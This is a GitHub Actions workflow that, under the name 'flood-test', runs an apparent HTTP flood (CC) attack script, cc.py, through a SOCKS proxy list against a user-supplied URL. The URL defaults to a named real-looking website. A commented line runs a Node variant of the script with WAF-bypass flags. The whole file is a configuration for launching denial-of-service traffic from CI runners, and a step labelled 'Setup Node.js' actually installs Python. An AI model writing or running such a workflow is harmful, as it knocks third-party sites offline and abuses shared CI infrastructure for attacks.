name: wow

on:
  workflow_dispatch:
    inputs:
      target_url:
        description: '目标URL'
        required: true
        default: 'https://www.minearm.org'

jobs:
  flood-test:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v4

      - name: Setup Node.js
        uses: actions/setup-python@v6
        with:
          python-version: '3.10'

      - name: Run flood test
        run: |
         # node cc-mod.js ${{ github.event.inputs.target_url }} cc.txt 20000 12 1 1 GET --waf --mode full
         pip install requests pysocks
         python3 cc.py -url ${{ github.event.inputs.target_url }} -f cc.txt -v 4 -s 21000
